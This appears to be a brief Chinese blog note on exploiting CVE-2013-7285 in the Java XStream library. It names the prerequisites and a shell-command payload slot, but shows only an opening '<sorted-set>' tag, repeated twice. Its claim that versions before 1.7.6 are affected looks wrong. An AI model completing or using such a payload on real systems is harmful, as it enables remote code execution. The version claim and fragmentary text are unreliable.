【笔记】CVE-2013-7285漏洞利用
前言
Java的com.thoughtworks.xstream.XStream包的1.7.6以前的版本出现的CVE-2013-7285的漏洞利用
漏洞利用前提
- Java
- 引用了1.7.6以前的版本的 com.thoughtworks.xstream.XStream 包
payload
<<command>>:Shell命令
1 | <sorted-set> |
57uv6Z6g55qE5Y2a5a6i
MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究,请勿非法破坏,请遵守相关法律法规,后果自负
Java的com.thoughtworks.xstream.XStream包的1.7.6以前的版本出现的CVE-2013-7285的漏洞利用
<<command>>:Shell命令
1 | <sorted-set> |